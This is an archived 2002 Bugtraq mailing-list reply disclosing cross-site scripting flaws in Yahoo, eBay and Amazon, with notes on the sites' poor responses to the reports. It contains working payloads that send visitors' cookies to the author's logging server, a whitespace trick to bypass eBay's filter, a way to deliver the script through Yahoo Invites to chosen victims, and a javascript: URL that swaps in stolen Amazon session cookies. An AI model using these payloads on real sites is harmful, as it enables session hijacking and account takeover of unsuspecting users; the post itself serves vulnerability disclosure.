Bugtraq mailing list archives
Re: Cross-Site Vulnerabilities (Still) Found in Major Web Sites
From: Andrew Wason <aw () rootbin com>
Date: 22 Jan 2002 14:10:58 -0000
In-Reply-To: <EFD4B3AC451FD5118E7400E018C326948275F2@AIRWOLF> > Yahoo, MSN, AOL, Lycos, and Excite suffer from such attack. So do ebay and Amazon. Yahoo will let you post pretty much any script/html (in invites, auctions etc.). ebay tries to strip references to document.cookie in auction postings, but putting whitespace in there fools it and allows it to be posted, e.g.: document . cookie Amazon only allows what they call "basic HTML" in their auction postings, but you can still get script past their filter e.g.: <b onMouseOver="new Image ().src='http://demo.rootbin.com:8080/~aw/logger.gif? cookie=' + escape(document.cookie)">test<b> When the user mouses over the word test, their cookies will be logged in my webserves log file. If a site allows <script> blocks to be posted, you can log the visitors cookies with no interaction: <script language="JavaScript"> new Image().src = "http://demo.rootbin.com:8080/~aw/logger.gif? cookie=" + escape(document.cookie); </script> Yahoo is interesting because they allow script to be posted in their "Yahoo Invites". http://invites.yahoo.com/ So you can craft an invitation that logs the users cookies and have Yahoo email it to the specific Yahoo users whose accounts you want to access. I established accounts with each of these (ebay, Yahoo and Amazon) and was able to collect cookies on myself and log into that users account by manually setting those cookies in my browser. Once you have the cookies (e.g. for amazon), visit amazon.com and enter this in your browser URL field (all one line): javascript:void(document.cookie="session-id- time=del;expires=Fri, 31 Dec 1999 23:59:59 GMT;domain=amazon.com;");void (document.cookie="session-id=del;expires=Fri, 31 Dec 1999 23:59:59 GMT;domain=amazon.com;");void (document.cookie="ubid-main=del;expires=Fri, 31 Dec 1999 23:59:59 GMT;domain=amazon.com;");void (document.cookie="x-main=del;expires=Fri, 31 Dec 1999 23:59:59 GMT;domain=amazon.com;");void (document.cookie="ubid-main=002-7079596- 1079533;domain=amazon.com;");void (document.cookie="x- main=OCoNWc8jtjGE0wvoNWc8jtjGEU0c? OkW;domain=amazon.com;") This first deletes your current session cookies and then replaces them with another users account information, logging you in (the account info above is bogus). On Yahoo, users can choose how long their accounts stay logged in before asking for a password again. So if you enter the Yahoo cookies during the time the user is logged in (within this window) you have full access to their email, calendar and a lot more. I notified Amazon, Yahoo and ebay a while ago - I had trouble finding out how to notify them. I ended up using feedback forms on their sites, and a feedback email alias at amazon. Amazon responded saying they use SSL so there's no problem (?). Yahoo responded with a form letter directing me to various FAQs, I replied and got no response. ebay did not respond. Andrew
Current thread:
- Cross-Site Vulnerabilities (Still) Found in Major Web Sites Watung Arif (Jan 21)
- <Possible follow-ups>
- Re: Cross-Site Vulnerabilities (Still) Found in Major Web Sites Andrew Wason (Jan 22)